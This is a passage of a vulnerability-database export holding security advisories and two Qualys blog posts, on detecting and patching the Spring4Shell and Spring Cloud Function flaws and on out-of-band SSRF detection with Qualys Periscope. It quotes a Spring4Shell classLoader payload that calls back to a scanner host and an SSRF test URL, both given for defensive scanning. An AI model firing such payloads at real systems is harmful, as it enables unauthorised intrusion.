All Palo Alto Networks cloud services with possible impact have been mitigated and remediated.\n\nThe following products and services are not impacted by these Spring vulnerabilities: AutoFocus, Bridgecrew, Cortex Data Lake, Cortex XDR agent, Cortex Xpanse, Cortex XSOAR, Enterprise Data Loss Prevention, Exact Data Matching (EDM) CLI, Expanse, Expedition Migration Tool, GlobalProtect app, IoT Security, Okyo Garde, Palo Alto Networks App for Splunk, PAN-OS hardware and virtual firewalls and Panorama appliances, Prisma Cloud, Prisma Cloud Compute, Prisma SD-WAN (CloudGenix), Prisma SD-WAN ION, SaaS Security, User-ID Agent, WildFire Appliance (WF-500), and WildFire Cloud.\n\n**Work around:**\nNo workarounds or mitigations are required for Palo Alto Networks products at this time.\n\nCustomers with a Threat Prevention subscription can block the attack traffic related to these vulnerabilities by enabling Threat IDs 92393, 92394, and 83239 for CVE-2022-22965 and Threat ID 92389 for CVE-2022-22963.\n\nSee https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/ for more details on Palo Alto Networks product capabilities to protect against attacks that exploit this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T02:30:00", "type": "paloalto", "title": "Informational: Impact of Spring Vulnerabilities CVE-2022-22963 and CVE-2022-22965", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T02:30:00", "id": "PA-CVE-2022-22963", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2022-04-08T16:57:59", "description": "_This page last updated: April 7th_\n\nA new zero-day Remote Code Execution (RCE) vulnerability, \u201cSpring4Shell\u201d or \u201cSpringShell\u201d was disclosed in the Spring framework. An unauthorized attacker can exploit this vulnerability to remotely execute arbitrary code on the target device. \n\n### What is Spring Framework? \n\nSpring-core is a prevalent framework widely used in Java applications that allows software developers to develop Java applications with enterprise-level components effortlessly. \n\n### Which versions are vulnerable? \n\nThe vulnerability requires JDK version 9 or later to be running. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions are vulnerable. It allows remote attackers to plant a web shell when running Spring framework apps on top of JRE 9. It is caused by unsafe deserialization of given arguments that a simple HTTP POST request can trigger to allow full remote access. \n\n### How can this be exploited? \n\nThe exploitation of this vulnerability relies on an endpoint with DataBinder enabled, which decodes data from the request body automatically. This property could enable an attacker to leverage Spring4Shell against a vulnerable application. 
In fact, the Spring framework class DataBinder warns about this in its [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>): \n\n\u201cNote that there are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data, for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases, this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\u201d \n\nThe root cause is therefore unsafe data binding of attacker-controlled request parameters onto nested ClassLoader properties, not deserialization. \n\n### What are the prerequisites to exploit this vulnerability? \n\nThe following conditions apply to the publicly known exploit; applications on affected Spring Framework versions running on JDK 9+ that do not match all of them should still be treated as potentially vulnerable and upgraded. \n\n * JDK 9 or higher \n * Apache Tomcat as the Servlet container \n * Packaged as a traditional WAR (in contrast to a Spring Boot executable jar) \n * spring-webmvc or spring-webflux dependency \n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions \n\n### Is there a patch available for Spring4Shell? \n\nSpring Framework 5.3.18 and 5.2.20, which contain the fixes, have been released. If you\u2019re able to upgrade to Spring Framework **5.3.18** and **5.2.20**, no workarounds are necessary. \n\nIf you cannot update to a fixed Spring Framework version, upgrading Apache Tomcat to **10.0.20**, **9.0.62**, or **8.5.78** closes the known Tomcat-side attack vector but does not fix the underlying vulnerability in Spring Framework. \n\nIn addition, there are multiple working proof-of-concept (PoC) exploits available for Spring4Shell. We strongly recommend that organizations deploy these mitigations or use a third-party firewall for defense. \n\n### Qualys Coverage \n\nQualys Research Team has released the following authenticated QIDs to address this vulnerability for now. These QIDs will be available starting with vulnsigs version VULNSIGS-2.5.438-3 and in Cloud Agent manifest version LX_MANIFEST-2.5.438.3-2. 
\n\n**QID**| **Title**| **Version**| **Available for** \n---|---|---|--- \n376506| Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell)| VULNSIGS-2.5.438-3| Scanner/Cloud Agent \n45525| Spring core or Spring beans jar detected| VULNSIGS-2.5.438-3| Scanner/Cloud Agent \n150494| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (CVE-2022-22963)| VULNSIGS-2.5.440-3| Web Application Security \n376508| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (Authenticated)| VULNSIGS-2.5.440-6/ lx_manifest-2.5.440.6-5| Scanner/Cloud Agent \n730418| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (Unauthenticated Check)| VULNSIGS-2.5.440-6| Scanner \n150495 | Spring Core Remote Code Execution (RCE) Vulnerability CVE-2022-22965 (Spring4Shell) | VULNSIGS-2.5.443-3 | Web Application Security \n48209 | Spring Framework and Spring Boot JARs Spring Cloud JARs Detected Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n376514 | Spring Framework Remote Code Execution (RCE) Vulnerability (Spring4Shell) Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n376520 | Spring Cloud Function Remote Code Execution (RCE) Vulnerability Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n730416 | Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell) (Unauthenticated Check) | VULNSIGS-2.5.445-3 | Scanner \n \n### Discover Your Attack Surface with up-to-date CyberSecurity Asset Management \n\nAs a first step, Qualys recommends assessing all assets in your environment to map the entire attack surface of your organization. \n\n#### Scoping Potential Attack Surface \n\nQualys Cybersecurity Asset Management (CSAM) continuously inventories all your assets and software. Use CSAM to find assets with Apache Tomcat running on JDK 9 or higher. 
\n \n \n QQL: software:(name:tomcat) and software:(name:\"jdk\" and version>=9) \n\n\n\n#### Finding Vulnerable Spring Components and Versions \n\nQualys CSAM can further help you narrow down the scope by adding Spring Framework to the search criteria, and specifically match on vulnerable components and versions. This can be used to find assets that have not yet been scanned with VMDR for the Spring4Shell QIDs. \n \n \n QQL: software:(name:tomcat) and software:(name:\"jdk\" and version>=9) and software:(name:\"Spring\" and version:\"vulnerable\") \n\n#### Monitoring Upgrades and Mitigations \n\nUpgrading to Spring Framework 5.3.18+ or 5.2.20+ addresses the root cause and prevents other attack vectors, and it adds protection for other CVEs. Qualys CSAM allows customers to list all Spring Framework versions and verify upgrades. \n\nHowever, some may be in a position where upgrading quickly is not possible. VMware provided an alternative mitigation: upgrade Apache Tomcat to versions 10.0.20, 9.0.62, or 8.5.78, which close the attack vector on Tomcat\u2019s side. Qualys CSAM allows you to check for the presence or absence of these Tomcat updates. \n\nQQL for assets with mitigated Tomcat: \n \n \n software:(name:tomcat and update:[`10.0.20`,`9.0.62`,`8.5.78`]) \n\nQQL for assets excluding mitigated Tomcat: \n \n \n software:(name:tomcat and not update:[`10.0.20`,`9.0.62`,`8.5.78`]) and software:(name:\"jdk\" and version>=9) and software:(name:\"Spring\" and version:\"vulnerable\") \n\n#### Context Is Critical to Prioritize and Remediate \n\nSecurity teams need to understand the distribution of affected assets from different perspectives, such as internet-exposed, production versus non-production, and which of these assets support business-critical services. 
Qualys CSAM integrates with additional sources to import asset and business context, which helps customers further understand their impact, prioritize assets based on business criticality, and work with corresponding asset owners and support groups to take remedial actions. \n\nQQL for assets with Tomcat exposed to the internet and visible in Shodan: \n \n \n software:(name:tomcat) and software:(name:\"jdk\" and version>=9) and tags.name:shodan \n\n\n\n### Detect the Vulnerability with Qualys WAS\n\nSecond, protect your public Internet-facing apps, as they are the most exposed to attack and therefore high priority. \n\nThe Qualys WAS Research Team has developed two signatures for detecting vulnerable versions of the Spring Framework. \n\n * QID 150494 (released April 1st) will report vulnerable versions of Spring Cloud Applications (CVE-2022-22963). \n * QID 150495 (released on the 6th) will report vulnerable versions of Spring Core Applications (CVE-2022-22965). \n\nThese QIDs are automatically added to the Core Detection Scope. If you are scanning web applications with the Initial WAS Option Profile then there is no further action necessary. Your scans will automatically test for vulnerable versions of the Spring Framework and report any vulnerable instances found. \n\nIf you are using a custom Option Profile for your scans, please ensure you are either using the Core Detection Scope in your Option Profile or adding the above QIDs to any static or dynamic Custom Search Lists. \n\n\n\nThese QIDs collectively use a combination of Out-of-Band and non-Out-of-Band tests for accurate detection. \n\n\n\nThe WAS Research Team is investigating other safe methods for detecting this vulnerability to compensate for potential False Negatives or False Positive cases. In the meantime, it is recommended to use WAS in coordination with other Qualys modules for a more comprehensive methodology for detecting the Spring4Shell vulnerability. 
\n\nIf your application is vulnerable to Spring4Shell, it is recommended that you immediately follow the steps outlined in the \u201cIs there a patch available for Spring4Shell?\u201d section of this blog. \n\n### Detect Spring4Shell Vulnerability Using Qualys VMDR\n\nNext, it\u2019s time to find Spring4Shell wherever it is hiding in your environment and prioritize your response. \n\nQualys VMDR customers should ensure all their assets are scanned against the above QIDs. As this vulnerability only targets the Spring Framework when deployed with JDK>9 and Tomcat, customers must at least ensure assets with Tomcat and JDK>9 are scanned. The following QQL can be used to find such assets: \n \n \n software:(name:tomcat and not update:[`10.0.20`,`9.0.62`,`8.5.78`]) and software:(name:\"jdk\" and version>=9) \n\n\n\nOnce assets have been scanned for the above QIDs, customers can use the following QQL to search for the Spring4Shell vulnerability in their environment: \n\nvulnerabilities.vulnerability.qid:376506 \n\n\n\n### Track Spring4Shell Progress with Unified Dashboard\n\nThe Unified Dashboard enables you to track this vulnerability and its impacted hosts, their status, and overall management in real-time. To help you quickly find vulnerable hosts and software, a new unified dashboard is created on the Qualys platform. This dashboard has extremely useful widgets listing all the vulnerable hosts, applications with vulnerable versions of Spring, and most importantly all the vulnerable hosts visible on the Internet. It provides visibility to compliance configurations and software on your \u2018External Attack Surface\u2019 visible on [Shodan](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) being the low-hanging opportunities for attackers. These widgets also list workloads hosted on shared cloud infrastructure and that have public IP addresses. 
To use this capability, download and import this Global Dashboard. \n\n[[Download and import \u201cSpring4Shell\u201d Global Dashboard](<https://2jws2s3y97dy39441y2lgm98-wpengine.netdna-ssl.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard.zip>)](<https://blog.qualys.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard-2.zip>)[Download](<https://blog.qualys.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard-2.zip>)\n\n\n\n### Detect Spring4Shell Vulnerabilities in Running Containers & Images\n\nIf you run Apache Tomcat in containers, then it is critical that you check for Spring4Shell vulnerabilities, given the high severity of this potential exploit. Qualys Container Security offers multiple methods to help you detect Spring4Shell vulnerabilities in your container environment. The Container Security sensor checks both running containers and container images for the following vulnerabilities: \n\n * QID 376506 (CVE-2022-22965) \n * QID 376508 (CVE-2022-22963) \n\nTo detect vulnerabilities in running containers, you must deploy the Container Security sensor in \u201cGeneral\u201d mode on the hosts running the containers. You can view the containers impacted by these vulnerabilities by navigating to the \u201cContainer Security\u201d application, then selecting the \u201cAssets-> Container\u201d tab, and using the following QQL query: \n\nvulnerabilities.qid:376506 or vulnerabilities.qid:376508 \n\n\n\nTo view details of the vulnerability, you can click on the vulnerable container and navigate to the \u201cVulnerabilities\u201d tab as shown in the screenshot below: \n\n\n\nIn addition to scanning running containers, Qualys recommends that you scan container images for Spring4Shell vulnerabilities. Catching and remediating Spring4Shell vulnerabilities in container images will eliminate exposure to the vulnerabilities when the image is instantiated as a container. 
\n\nTo view all the impacted images, navigate to the Qualys Container Security app, then select the \u201cAssets -> Images\u201d tab, and use the following QQL query: \n \n \n vulnerabilities.qid:376506 or vulnerabilities.qid:376508 \n\n\n\nTo view details of the vulnerability, you can click on the image and navigate to the \u201cVulnerabilities\u201d tab as shown in the screenshot below: \n\n\n\nQualys Container Security offers a comprehensive solution for detecting vulnerabilities, including Spring4Shell, across the entire lifecycle of the container from build time to runtime. \n\n### Remediate Spring4Shell Using Qualys Patch Management\n\nThe recommended way to patch this vulnerability is by updating to Spring Framework 5.3.18 and 5.2.20 or greater. Customers can use Patch Management\u2019s install software action to download and script the upgrade. Note that customers can create a patch job that only includes the install/script action, in which case there is no need to add patches to the job. Alternatively, if upgrading the Spring Framework is not possible, customers can use Qualys patch management to patch Tomcat to versions: 10.0.20, 9.0.62, or 8.5.78. Tomcat patches are supported out-of-the-box and require no special configuration. \n\n\n\n### Detect Spring4Shell Exploitation Attempts with Qualys XDR\n\nAn important last step in confronting Spring4Shell is to ensure that your organization has not already been targeted by attacks that exploit this vulnerability. \n\nThe Qualys Threat Intelligence team has released the following XDR correlation rules for detecting Remote Code Execution exploitation attempts. These rules are available today via your TAM for quick import and implementation and will be delivered as part of a rule pack in a future XDR release. 
\n\nT1190 - [Palo Alto Firewall] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Check Point IPS] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Fortinet Firewall] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Trend Micro TippingPoint IPS] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\n### FAQ: \n\n#### Is this vulnerability related to CVE-2022-22963? \n\nThere is some confusion about this zero-day vulnerability due to another unrelated Spring vulnerability (CVE-2022-22963) published on March 29, 2022. This vulnerability, CVE-2022-22963, impacts Spring Cloud Function, which is not part of Spring Framework. \n\nQIDs 376508 and 730418 are available to address this CVE. \n\n#### What is the detection logic for QID 376506: Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell)? \n\nQID 376506 is an authenticated check currently supported on Linux and Windows Operating Systems. \n\nOn Linux systems, detection checks whether the system has Java 9 or later and executes \u2018locate\u2019 and \u2018 ls -l /proc/*/fd \u2018 to check whether one of \u2018 spring-webmvc-*.jar \u2018, \u2018 spring-webflux*.jar \u2018 or \u2018 spring-boot.*jar \u2018 is present on the system. \n\nOn Windows systems, detection uses WMI to check whether spring-webmvc, spring-webflux and spring-boot appear on the command line of running processes with JDK 9 or higher. \n\nContainer Sensor image scanning uses the find command to check for spring-webmvc, spring-webflux and spring-boot jars inside .war files, along with JDK 9 or higher. \n\n#### Under what situations would QID 376506 not detect the vulnerability? \n\nQID 376506 might not report the vulnerability if access to /proc/*/fd is restricted or if the spring-core or spring-beans file is embedded inside other binaries, such as jar, war, etc. 
\n\nFurthermore, this QID might not report the vulnerability if the locate command is not available on the target. Targets on Java versions less than 9 are not vulnerable. \n\n#### What is the detection logic for QID 730416 (unauthenticated check)? \n\nQID 730416 is a remote unauthenticated check. It sends a specially crafted HTTP GET request to the remote web application and tries to obtain a callback to the scanner using the payload: \n \n \n \"?class.module.classLoader.resources.context.configFile=http://<Scanner_IP>:<Random_port>&class.module.classLoader.resources.context.configFile\" \n\nQID 730416 is an intrusive check. The payload used in the detection may in some cases change the Spring configuration on the target application, which can hamper the application's logging capabilities. \n\n#### Under what conditions would QID 730416 not work? \n\nQID 730416 will not work if any of the following conditions are present: \n\n * \"Do not exclude Intrusive checks\" is not enabled in the Scan Option Profile. \n * This QID only checks for the vulnerability at the root URI. If the vulnerability lies in non-root URIs, the QID will not detect it. \n * Communication from the host to the scanner is blocked. \n * The payload gets blocked by a firewall, IPS, etc. that is between the host and the scanner. \n\n### Updates\n\n**Update \u2013 April 7** \n\nA new QID (730416) was added to address CVE-2022-22963 under \u201cQID Coverage\u201d. \n\n**Update \u2013 April 6** \n\nSeveral new QIDs to address CVE-2022-22963 are now available under \u201cQID Coverage\u201d. The CSAM section has been expanded. \n\n**Update \u2013 April 5** \n\nGuidance added for detection using Qualys CSAM, VMDR and XDR, and tracking remediation progress using Unified Dashboards and Patch Management. 
\n\n**Update \u2013 April 4** \n\nQualys has added a [scan utility](<https://github.com/Qualys/spring4scanwin>) for Windows and a [scan utility](<https://github.com/Qualys/spring4scanlinux>) for Linux that scan the entire hard drive(s), including archives and nested JARs, for files that indicate the Java application contains a vulnerable Spring Framework or Spring Cloud library. \n\n**Update \u2013 April 1** \n\nNew QIDs to address CVE-2022-22963 are now available. See the \u201cQID Coverage\u201d section. \n\n**Update \u2013 March 31** \n\nCVE-2022-22965 is now assigned to this vulnerability. Qualys Research Team has released QIDs as of March 30 and will keep updating those QIDs as new information is available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T09:00:00", "type": "qualysblog", "title": "Spring Framework Zero-Day Remote Code Execution (Spring4Shell) Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T09:00:00", "id": "QUALYSBLOG:6DE7FC733B2FD13EE70756266FF191D0", "href": 
"https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-06T22:09:26", "description": "Qualys previously announced the introduction of [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) in 2020. This technology allows [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) (WAS) to detect out-of-band vulnerabilities such as [server-side request forgery](<https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/>) (SSRF). [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) provides confirmed detections for additional vulnerabilities, such as Log4j, where it enables rapid development and release of the QID. Occasionally, Qualys receives questions and support cases related to [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>). This article will provide more detail on the common questions/situations seen with out-of-band detections. 
\n\nAs of publishing, the vulnerability detections that utilize [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) are:\n\n * QID 150055 \u2013 OS Command Injection\n * QID 150179 \u2013 Blind XXE injection\n * QID 150255 \u2013 SMTP Header Injection\n * QID 150258 \u2013 Server-Side Request Forgery (SSRF)\n * QID 150267 \u2013 Oracle WebLogic Remote Code Execution Vulnerability (CVE-2019-2725)\n * QID 150278 \u2013 DNN RCE Vulnerability (CVE-2017-9822)\n * QID 150279 \u2013 Jira Server Side Request Forgery (SSRF) Vulnerability (CVE-2019-8451)\n * QID 150298 \u2013 SSRF to AWS Metadata Service\n * QID 150307 \u2013 External Service Interaction via HTTP Header Injection\n * QID 150339 \u2013 Oracle WebLogic Server Unauthenticated Remote Code Execution Vulnerability\n * QID 150364 - Keycloak SSRF Vulnerability (CVE-2020-10770)\n * QID 150426 - Adobe Experience Manager: SSRF via Salesforce Secret Servlet\n * QID 150427 - Adobe Experience Manager: SSRF via Reporting Services Servlet\n * QID 150428 - Adobe Experience Manager: SSRF via Site Catalyst Servlet\n * QID 150429 - Adobe Experience Manager: SSRF via Auto Provisioning Servlet\n * QID 150430 - Adobe Experience Manager: SSRF via Opensocial\n * QID 150440 - Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228)\n * QID 150441 - Forms Vulnerable to Apache Log4j Remote Code Execution (RCE) Vulnerability (Log4Shell CVE-2021-44228)\n * QID 150445 - Apache Solr SSRF Vulnerability (CVE-2021-27905)\n * QID 150494 - Spring Cloud Function Remote Code Execution (RCE) Vulnerability (CVE-2022-22963)\n * QID 150495 - Spring Core Remote Code Execution (RCE) Vulnerability CVE-2022-22965 (Spring4Shell)\n * QID 150498 - WordPress AnyComment Plugin: Arbitrary HyperComments Import/Revert via CSRF Vulnerability (CVE-2022-0134)\n * QID 150503 - NodeJS Command Injection Vulnerability (CVE-2021-21315)\n * QID 150504 
- Apache Struts 2 Remote Code Execution Vulnerability (CVE-2021-31805)\n * QID 150557 - Apache Spark Shell Command Injection Vulnerability (CVE-2022-33891)\n * QID 150574 - Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-3680)\n\n# Functionality\n\nThe detection mechanism consists of the following steps:\n\n 1. When Qualys WAS scans a web application for out-of-band vulnerabilities, it fuzzes/injects the fields with specially-crafted payloads. Different payloads are used for different vulnerability types. In this example, WAS scans the web app at \u201cwww.example.com\u201d. Imagine this web app includes functionality to display an image that is retrieved from a specific URL. To test for SSRF, a request similar to the one below would be sent by the scanner. Here we see the field being fuzzed is the \u201curl\u201d query string parameter, and the specific payload is for SSRF. https://www.example.com/loadImage?url=http%3A%2F%2F2a3b948a2b0a.1463985_40627.1466122137.ssrf01.ssrf.in03.qualysperiscope.com\n 2. If the scanned web application is vulnerable, it tries to make the following HTTP request but must first resolve the FQDN under the qualysperiscope.com domain mentioned in the payload. \nhttp://2a3b948a2b0a.1463985_40627.1466122137.ssrf01.ssrf.in03.qualysperiscope.com\n 3. Now, as a part of the DNS resolution process, the request will hit [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>)\u2019s DNS service. The DNS service initially processes the request to verify the hash embedded in the request is valid. This ensures the lookup request is genuine and was generated from a WAS scan. Once everything is verified, [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) logs the request internally. 
If verification fails, the request is simply dropped.\n 4. Subsequently, Qualys WAS will ask for the lookup request data from [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) along with the scan ID and a hash. [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) again verifies the hash and serves the external request data corresponding to that scan ID (if present). \nThe data received from [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) is in JSON as below: \n{ \"lookup\": \"A-record\", \"request\": \"2a3b948a2b0a.1463985_40627.1466122137.ssrf01.ssrf.in03.qualysperiscope.com\" } \n\n 5. Web Application Scanning (WAS) processes the data received from [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>), and reports the vulnerabilities corresponding to the payloads that were successfully executed.\n\n# Request Source IP Address\n\nQualys WAS sends a unique URL for each vulnerability test. This allows a correlation between the injected value and the request received by [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>). We can be sure which injection caused the external service interaction. What may be less clear is what system made that request to [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>).\n\nAs the detection is executed against an application, the injection point is known. 
This is apparent from the QIDs:\n\nQID 150557 - Apache Spark Shell Command Injection Vulnerability (CVE-2022-33891)\n\nQID 150258 \u2013 Server-Side Request Forgery (SSRF)\n\nSince unique dynamic URLs are used, the address must be resolved via DNS. Typically, the target application will not resolve the DNS itself. A DNS resolver will query through the DNS hierarchy to resolve the address. Therefore, the DNS request that comes to the [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) server may be from a DNS resolver or other system that is not the target application/server. The numerous devices/software in a networked system can lead to any number of devices being the source of the DNS request. Proxies, reverse proxies, firewalls, web application firewalls, load balancers, host-based security software, etc., could all potentially issue the request, and we have observed cases where that has occurred. \n\n## Potential \u201cFalse Positives\u201d\n\nWhen a [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) detection occurs during a CVE-based QID, you can be assured it is valid. However, there are times when the non-CVE detection could be false positives. Take a contact form on an application. This form takes a name and a message. If Qualys WAS injects the Periscope URL in the message body, most likely, the email will be sent. This email then hits an email security appliance that performs a reputation check on the URL. There is no history for the URL as it is dynamically created, so the service visits the URL to evaluate it. 
First, it must resolve the DNS address, which would result in the [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) server receiving the request from the email security provider. A similar situation may occur if the request with Periscope URL results in an error. This error could be logged, and an email is sent to the application administrator. As the URL is now in an email, the email security system checks the URL and results in a hit to [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>).\n\n## Potential False Negatives\n\nInternal systems may not have Internet access which is required to reach our [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) system. If a proxy is required, the injected URL cannot use that path. SSRF does not need to reach out to a network to cause issues. If an attacker has knowledge of the internal network, they could use SSRF to pivot/make requests to an internal server. \n\n# Final Thoughts\n\nEven when a different system makes the request, it is advised to mitigate the issue at the application level. Focus on the injection point in the scan report. Should this field, parameter, and header value accept untrusted URLs? Applications should not accept untrusted input. If you must accept URLs, whitelist the approved URLs.\n\nUltimately, the customer's organization is better equipped to investigate false positives than Qualys support. Because unique URLs are utilized, Qualys can be confident the scan did trigger a system to make the DNS request. Application owners/developers and network engineers should know the inner workings of systems necessary to determine where the request originated. 
As [Qualys Periscope](<https://blog.qualys.com/product-tech/2020/01/15/introducing-periscope-out-of-band-vulnerability-detection-mechanism-in-qualys-was>) is not available outside of scan, if additional testing or verification is needed, consider using [interactsh](<https://github.com/projectdiscovery/interactsh>) available [here](<https://github.com/projectdiscovery/interactsh>), or the hosted version at [app.interactsh.com](<http://app.interactsh.com/>). Once the vulnerability is addressed, rescan with Qualys WAS to close the detection.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-01T23:11:35", "type": "qualysblog", "title": "Identify Server-Side Attacks Using Qualys Periscope", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9822", "CVE-2019-2725", "CVE-2019-8451", "CVE-2020-10770", "CVE-2021-21315", "CVE-2021-27905", "CVE-2021-31805", "CVE-2021-44228", "CVE-2022-0134", "CVE-2022-22963", "CVE-2022-22965", "CVE-2022-33891", "CVE-2022-3680"], "modified": "2022-12-01T23:11:35", "id": "QUALYSBLOG:5FAC1C82A388DBB84ECD7CD43450B624", "href": 
